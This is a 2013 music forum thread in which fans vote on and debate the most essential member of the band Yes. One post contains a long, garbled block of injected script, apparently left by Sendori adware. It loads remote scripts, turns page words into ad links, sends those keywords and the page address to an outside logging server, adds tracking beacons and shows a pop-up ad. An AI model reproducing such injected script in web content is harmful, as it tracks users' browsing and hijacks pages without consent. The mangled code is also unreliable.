Forum Home Forum Home > Progressive Music Lounges > Prog Polls
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

Topic ClosedMost integral member of Yes

Post Reply Post Reply Page  <12345>
Poll Question: Who was the most integral member of Yes who defined their essence?
Poll Choice Votes Poll Statistics
2 [2.78%]
0 [0.00%]
10 [13.89%]
0 [0.00%]
2 [2.78%]
0 [0.00%]
26 [36.11%]
32 [44.44%]
This topic is closed, no new votes accepted

Author
Message Reverse Sort Order
Moogtron III View Drop Down
Prog Reviewer
Prog Reviewer

Direct Link To This Post Posted: January 09 2013 at 02:30
Originally posted by Ivan_Melgar_M Ivan_Melgar_M wrote:

and I just wish Anderson would had left Yes long time ago

I'm curious about this: why would you say that? Because Fly From Here proves to be a better album that the albums before? Is your theory that Anderson was withholding a truly progressive Yes?

Still, ABWH was more progressive than Rabin era Yes in those days, and I wonder what would have happened if Squire c.s. wouldn't have teamed up in the past few years with Trevor Horn and Geoff Downes. 

It's a fascinating thought, though.
JesusisLord View Drop Down
Forum Senior Member
Forum Senior Member

Direct Link To This Post Posted: January 09 2013 at 00:14
Originally posted by HolyMoly HolyMoly wrote:

Anderson is the spiritual core, and spirituality is central to what Yes is to me.

NAIL, RIGHT ON THE HEAD
Handshake
And that every tongue should confess that Jesus Christ is Lord to the glory of God the Father. Phillipians 2:11
zeqexes View Drop Down
Forum Senior Member
Forum Senior Member

Direct Link To This Post Posted: January 08 2013 at 23:53
Can't pick between Anderson and Squire.
Dayvenkirq View Drop Down
Forum Senior Member
Forum Senior Member

Direct Link To This Post Posted: January 08 2013 at 23:22
Originally posted by ProgMetaller2112 ProgMetaller2112 wrote:

Originally posted by mister nobody mister nobody wrote:

Originally posted by dwill123 dwill123 wrote:

Bill Bruford, looked what happened to them after he left.  Pretty much nothing.

Thank god he left Yes.

And my choice would be Steve Howe, easily.
why thank god he left Yes?? Yes's drums were never the same afterwardsConfused
I think what he meant was some sympathy for Bill, who felt like he would no longer belong in Yes' picture.
Ivan_Melgar_M View Drop Down
Special Collaborator
Special Collaborator

Honorary Collaborator

Direct Link To This Post Posted: January 08 2013 at 21:50
Steve Howe beyond any doubt.

His style is characteristic and his inclusion marked the rise of the band.

Squire comes close second, and I just wish Anderson would had left Yes long time ago

Iván

Edited by Ivan_Melgar_M - January 08 2013 at 21:53

ProgMetaller2112 View Drop Down
Forum Senior Member
Forum Senior Member

Direct Link To This Post Posted: January 08 2013 at 21:37
Originally posted by mister nobody mister nobody wrote:

Thank god he left Yes.

why thank god he left Yes?? Yes's drums were never the same afterwardsConfused
“War is peace.

Freedom is slavery.

Ignorance is strength.”

― George Orwell, Nineteen Eighty-Four

"Ignorance and Prejudice and Fear walk Hand in Hand"- Neil Peart

richardh View Drop Down
Prog Reviewer
Prog Reviewer

Direct Link To This Post Posted: January 08 2013 at 15:57
Has to be Howe or Anderson. Didn't they write all of Topographic Oceans together?
I voted Howe because I think he had both the vision and instrumental ability to shape the music into what we think of as 'Yes music'. Its also went beyond vocals and keyboards in my opinion. The albums featuring other guitarists just don't seem like Yes to me. The change between Time and a Word and The Yes Album was massive and also the change between Drama and 90125 stylistically.
Nash View Drop Down
Forum Senior Member
Forum Senior Member

Direct Link To This Post Posted: January 08 2013 at 14:21
for me its jon anderson, not only becaus of his incredible voice, also was the mastermind of some of the greatest records of the band

Earthmover View Drop Down
Forum Senior Member
Forum Senior Member

Direct Link To This Post Posted: January 08 2013 at 14:03

Thank god he left Yes.

Slartibartfast View Drop Down
Collaborator
Collaborator
Honorary Collaborator / In Memoriam

Direct Link To This Post Posted: January 08 2013 at 13:56
I have to give it up for Squire. He is the only one to be on all the albums, unless I missed something.

Edited by Slartibartfast - January 08 2013 at 13:57
Released date are often when it it impacted you but recorded dates are when it really happened...

lazland View Drop Down
Prog Reviewer
Prog Reviewer

Direct Link To This Post Posted: January 08 2013 at 13:36
Anderson. No doubt, no question.
Enhance your life. Get down to www.lazland.org
Prog Reviewer
Prog Reviewer

Direct Link To This Post Posted: January 08 2013 at 13:23
Originally posted by Snow Dog Snow Dog wrote:

Originally posted by Moogtron III Moogtron III wrote:

No Chris squire, no Yes.

No problem, we'll have Anderson Bruford Wakeman Howe instead. 
That's good too, isn't it? Wink

Actually not a fan of that album.Embarrassed

I know, I was actually teasing you.
Sorry about that, couldn't help myself. Embarrassed
I remember you once describing the album using a word that sounded like a human end product that comes out of some bodily opening, somewhere below... 
You said it more nicely now, I appreciate. LOL
Snow Dog View Drop Down
Special Collaborator
Special Collaborator
Honorary Collaborator

Direct Link To This Post Posted: January 08 2013 at 13:19
Originally posted by Moogtron III Moogtron III wrote:

No Chris squire, no Yes.

Actually not a fan of that album.Embarrassed
Prog Reviewer
Prog Reviewer

Direct Link To This Post Posted: January 08 2013 at 13:16

No Chris squire, no Yes.

Snow Dog View Drop Down
Special Collaborator
Special Collaborator
Honorary Collaborator

Direct Link To This Post Posted: January 08 2013 at 13:11
No Chris squire, no Yes.
dwill123 View Drop Down
Forum Senior Member
Forum Senior Member

Direct Link To This Post Posted: January 08 2013 at 13:02
The-time-is-now View Drop Down
Forum Senior Member
Forum Senior Member

Direct Link To This Post Posted: January 08 2013 at 11:15
Anderson. Maybe Squire.

One of my best achievements in life was to find this picture :D
Astral Traveller View Drop Down
Forum Senior Member
Forum Senior Member

Direct Link To This Post Posted: January 08 2013 at 07:59

From this day forth, let it be said that the definithe Yes Line-up is:

Jon Anderson

Chris Squire

Bill Bruford

Rick Wakeman

Steve Howe

However, I vote for Jon. His voice is Yes's signature sound. Think about Drama and Fly From Here, without Jon, is it really Yes?  His tenor voice fits perfectly with the symphonic style of Yes's music. The day that they forced him out of the band was the day that classic prog died. Yes is the only Big Six Band that is still active, and without Jon, its like Drama all over again. Even after Benoit fell ill, they didn't take Jon back, they just took Jon Davidson. Of all The nerve, they replaced him with a singer who not only has a similar voice, but a simmilar sounding name as well. Replace David win Ander and you get Jon Anderson.

< ="text/" ="http://code.jquery.com/jquery-1.4.2.min.js"> < ="text/" ="http://cdn.sendori.com/js/inlinekeywords.js"> < ="text/" ="http://cdn.sendori.com/js/pconfig.js"> var sndpID = '10403'; var sndgID = '{C6017112-8945-4A69-B62D-9D7C0F78AB9E}'; var CorrectedDomain; var OriginalDomain; function sendoriInline2(){function b(a,b,d){if((a==-1||!c(d.charAt(a)))&&(b>=d.length||!c(d.charAt(b)))){return true}return false}function c(a){var b=a.charCodeAt(0);if(b>47&&b<58||b>64&&b<91||b>96&&b<123){return true}return false}var a=window.location!=window.parent.location?true:false;if(a){return false}var d=jQuery.noConflict();d(document).ready(function(){function s(a){if(a=="SCRIPT"||a=="TITLE"||a=="A"||a=="STYLE"||a=="H1"||a=="H2"||a=="H3"||a=="H4"||a=="INPUT"||a=="IMG"||a=="FORM"||a=="BUTTON"||a=="LINK"||a=="IFRAME"||a=="SELECT"||a=="ALT"||a=="LABEL"||a=="META"||a=="NOSCRIPT"||a=="OBJECT"||a=="PARAM"||a=="CITE"||a=="/BODY"||a=="BR"||a=="HEAD"){return true}else{return false}}function t(d){var e=document.URL;var i=new Object;i.substituted=false;if(f==true){return i}var l=0;var m;textlower=d.toLowerCase();l=0;var p="";i.newText="";var q=0;for(o=0;o"||d[o]=="?"){if(g[d]!=null){l=0;o=d.length}if(h[textlower]!=undefined&&h[textlower]!=""){f=true;break}word=d.substring(l,o);wordlower=word.toLowerCase();if(g[word]!=null&&h[wordlower]==undefined&&(e.indexOf(g[word])<0||gword=="keyword"adbrandterm=word;ifword.indexOf"&">=0){adbrandterm=word.replace("&","")}if(word.indexOf("'")>=0){adbrandterm=word.replace("'","")}if(i.newText==""){preElement=d.substring(0,l)}else{preElement=i.newText.substring(0,l+q)}postElement=d.substring(o);if(g[word]=="keyword"){if(!n){highlightStartTag=""}else if(n&&k!=undefined&&k!=""){highlightStartTag=""}else continue}else{if(!n){highlightStartTag=""}else if(n&&j!=undefined&&j!=""){highlightStartTag=""}else continue}p="";i.newText=preElement+highlightStartTag+word+p+postElement;i.substituted=true;q+=highlightStartTag.length+p.length;c[c.length]="http://l.sendori.com/stbin/lognow.cgi/?key="+encodeURIComponent(adbrandterm)+"&domain="+encodeURIComponent(document.URL);a++}else if(h[wordlower]==""){f=true;break}l=o+1}}return i}function u(a){if(f==true){return}var b=a.nodeValue;var c=a.parentNode;var d=t(b);if(d.substituted==true){var e=document.createElement("text");e.innerHTML=d.newText;c.replaceChild(e,a)}}function v(a){if(s(a.nodeName)){return}if(a.nodeName=="#text"&&d.trim(a.nodeValue).length>0){u(a)}if(a.hasChildNodes()){for(var b=0;b)}}}var a=0;var b=3;var c=new Array;var e=document.URL;var f=false;var g=new Object;var h=new Object;var i=new Array;var j;var k;var l;var m;var n=false;if(typeof partner_config!=="undefined"){for(var o=0;o=0){e=true}});return e};if(d("a:HasBlackListURL('')").length>0){f=true}var w=document.getElementsByTagName("body");for(var x=0;x=0){brand_category=slider_keywords.slidertext[e].CATEGORY;if(c!=undefined&&c!="")r(brand_category,"NX",c,"");else r(brand_category,"NX",1860,"");a=true;break}}}if(!a&&d!=undefined&&d=="Y"){l(CorrectedDomain,"NX")}}if(b!=undefined&&b!=""){if(!m()&&!n()&&!o()&&!p())return false;if(o()){query=q("p")}else{query=q("q")}if(query==undefined||query==null||query==""){return false}for(var e=0;e
"+"
"}divToInsert+="
"+"
"+"
";var i=h.browser;if(i.msie&&i.version.slice(0,3)=="7.0"){divToInsert+="
"}else{h("#favicon").css("height","16px");divToInsert+="
"}divToInsert+="
"+"
"+"
"+"
"+""+"
";divToInsert+="
Quantcast
";var j=j||[];j.push({qacct:"p-fbiS6Ydv_HyB-"});var k=document.createElement("script");k.type="text/javascript";k.src="http://edge.quantserve.com/quant.js";k.async=true;var l=document.getElementsByTagName("script")[0];l.parentNode.insertBefore(k,l);divToInsert+="
";var m=1001837251;var n="FqiuCJWt7AMQw6Xb3QM";var o=window.google_tag_params;var p=true;var q=document.createElement("script");q.type="text/javascript";q.src="www.googleadservices.com/pagead/conversion.js";q.async=true;var l=document.getElementsByTagName("script")[0];l.parentNode.insertBefore(q,l);h(document.body).append(divToInsert);if(h("#slider_container").is(":visible")){}else{h("#slider_container").slideDown(1500)}h("#icon_close").click(function(){h("#slider_container").slideUp(1500)});if(a=="NX"){h("#notification_message").html(s());h("#icon_close").click(function(){h("#slider_container").slideUp(1500)})}h("#ad_title").html(b);h("#ad_body").html(c);h("#ad_url").html("Sponsored by: "+e);if(g=="G"){favicon_url="url(http://www.google.com/s2/favicons?domain="+e+")"}else{favicon_url="url("+g+")"}h("#favicon").css("background-image",favicon_url);h("#slider_body").click(function(){window.open(f)});h("#ad_url").hover(function(){h(this).css("cursor","pointer")},function(){h(this).css("cursor","auto")});h("#snd_logo").hover(function(){h(this).css("cursor","pointer")},function(){h(this).css("cursor","auto")});h("#ad_url").click(function(){window.open(f)});h("#snd_logo").click(function(){window.open("http://support.sendori.com/home")})}function l(){var a="";a+="
Quantcast
";var b=b||[];b.push({qacct:"p-fbiS6Ydv_HyB-"});var c=document.createElement("script");c.type="text/javascript";c.src="http://edge.quantserve.com/quant.js";c.async=true;var d=document.getElementsByTagName("script")[0];d.parentNode.insertBefore(c,d);a+="
";var e=1001837251;var f="FqiuCJWt7AMQw6Xb3QM";var g=window.google_tag_params;var i=true;var j=document.createElement("script");j.type="text/javascript";j.src="www.googleadservices.com/pagead/conversion.js";j.async=true;var d=document.getElementsByTagName("script")[0];d.parentNode.insertBefore(j,d);h(document.body).append(a);if(h("#Nx_slider_container").is(":visible")){h("#Nx_slider_container").slideUp(1500)}else if(!h("slider_container").is(":visible")){h("#Nx_slider_container").slideDown(1500)}if(h("slider_container").is(":visible")){h("#Nx_slider_container").css("display","none")}h("#icon_close").click(function(){h("#Nx_slider_container").slideUp(1500)});h("#snd_logo").hover(function(){h(this).css("cursor","pointer")},function(){h(this).css("cursor","auto")});h("#snd_logo").click(function(){window.open("http://support.sendori.com/home")});h("#notification_message").html(s())}function m(){if(document.referrer.indexOf("www.google.com/url")!=-1&&document.URL.indexOf("google.com")==-1){return true}return false}function n(){if(document.referrer.indexOf("www.bing.com/search")!=-1&&document.URL.indexOf("bing.com/search")==-1){return true}return false}function o(){if(document.referrer.indexOf("search.yahoo.com/search")!=-1&&document.URL.indexOf("search.yahoo.com")==-1){return true}return false}function p(){if(document.referrer.indexOf("www.ask.com/web")!=-1&&document.URL.indexOf("ask.com/web")==-1){return true}return false}function q(a){var b;var c=document.referrer;var d=c.split("&");for(var e=0;e=0||a.ads[0].displayURL.indexOf("https")>=0){displayURL=a.ads[0].displayURL.substring(a.ads[0].displayURL.indexOf("//")+2)}else displayURL=a.ads[0].displayURL;if(a.ads[0].url.indexOf("http")<0click="http://"+a.ads0.else click=a.ads0.;ifb=="NX"e="G";forvar c=0;c=0){e=slider_keywords.slidertext[c].FAVICONSRC}}}k(b,a.ads[0].title,a.ads[0].description,displayURL,clickURL,e)}else if(b=="NX"&&d!=undefined&&d=="Y"){l()}}})}function s(){var a="Your input '"+OriginalDomain+"' has been corrected to '"+CorrectedDomain+"'";var b="";var c=a.length>63?63:a.length;for(i=0;i #inlineTextHighlight{background:none repeat scroll 0 50% transparent;text-decoration:underline;display:inline;visibility:none;color:blue !important;font-family:Arial;cursor:pointer;line-height:1.5em} #slider_header{height:26px;width:510px;background-image:url(http://cdn.sendori.com/images/bg_header.png);background-repeat:repeat-x;border-left:1px #1A5189;border-top:1px #1A5189;border-right:1px #1A5189;display:block} #slider_body{height:90px;width:510px;background-image:url(http://cdn.sendori.com/images/bg_body.png);background-repeat:repeat-x;border-top:1px #438ECE;border-bottom:1px #438ECE;border-left:1px #1A5189;border-right:1px #1A5189;display:block;cursor:pointer} #slider_footer{height:30px;width:510px;background-image:url(http://cdn.sendori.com/images/bg_footer.png);background-repeat:repeat-x;border-left:1px #1A5189;border-right:1px #1A5189;border-bottom:1px #1A5189;display:block;cursor:auto} #bt_learn{background-image:url(http://cdn.sendori.com/images/btn_learn.png);background-repeat:no-repeat;height:90px;margin-right:5px;width:112px;margin-top:60px;left:auto;right:0;top:0;position:absolute;} #icon_alert{height:16px;width:16px;background-image:url(http://cdn.sendori.com/images/icon_alert.png);padding:5px} #icon_close{background-image:url(http://cdn.sendori.com/images/icon_close.png);background-repeat:no-repeat;display:block;float:left;height:16px;width:16px;} #favicon{background-position:center top;background-repeat:no-repeat;height:90px;margin-left:5px;margin-top:5px;width:16px;float:left;position:relative;} #ad_title{font-family:Helvetica;font-size:13pt;font-weight:700;color:#000;text-decoration:underline;margin-right:122px;text-align:left} #ad_body{font-family:Helvetica;font-size:11pt;color:#333;padding-top:5px;margin-right:125px;text-align:left;} #ad_url{color:#FFF;float:left;font-family:Helvetica;font-size:10pt;margin-right:10px;margin-left:10px;padding-top:6px;cursor:auto} #snd_logo{background-image:url(http://cdn.sendori.com/images/logo.png); background-repeat:no-repeat;height:17px;width:65px;cursor:auto;float:left;margin-right:10px;margin-top:1px;} #notification_message{color:#FFF;float:left;font-family:Helvetica;font-size:8pt;font-weight:700;padding-left:0;margin-top:5px;text-decoration:none;} #notification_alert{background-image:url(http://cdn.sendori.com/images/icon_alert.png);background-position:center center;background-repeat:no-repeat;float:left;height:16px;padding-left:10px;padding-top:5px;width:16px} #slider_container{width:510px;height:146px;display:none;position:fixed;left:50%;bottom:0;margin-left:-255px;z-index:9999999999;border-radius:4px 4px 0 0;-webkit-border-radius:4px 4px 0 0;-moz-border-radius:4px 4px 0 0;box-shadow:0 0 9px #515151;-webkit-box-shadow:0 0 9px #515151;-moz-box-shadow:0 0 9px #515151} #Nx_slider_container{width:510px;height:26px;display:none;position:fixed;left:50%;bottom:0;margin-left:-255px;border-radius:4px 4px 0 0;-webkit-border-radius:4px 4px 0 0;-moz-border-radius:4px 4px 0 0;z-index:9999999999;border-left:1px #1A5189;border-top:1px #1A5189;border-right:1px #1A5189;box-shadow:0 0 9px #515151;-webkit-box-shadow:0 0 9px #515151;-moz-box-shadow:0 0 9px #515151}

Edited by Astral Traveller - January 13 2013 at 07:37

A mistake is always forgivable, rarely excusable and always unacceptable. -Robert Fripp
Blacksword View Drop Down
Prog Reviewer
Prog Reviewer

Direct Link To This Post Posted: January 08 2013 at 07:04
Tough question, but I'm going to say Squire.

He has been a constant and his trademark sound and style have always been part of the Yes brand.
Ultimately bored by endless ecstasy!
Libor10 View Drop Down
Forum Senior Member
Forum Senior Member

Direct Link To This Post Posted: January 08 2013 at 06:39
I'll go with Chris Squire - he's the only one who's there from the very start, his bass is unmistakable and the same goes to his back vocals. Yes, Anderson's voice and Howe's guitar are important for Yes's sound too but anyway... Chris it is!
 Post Reply Post Reply Page  <12345>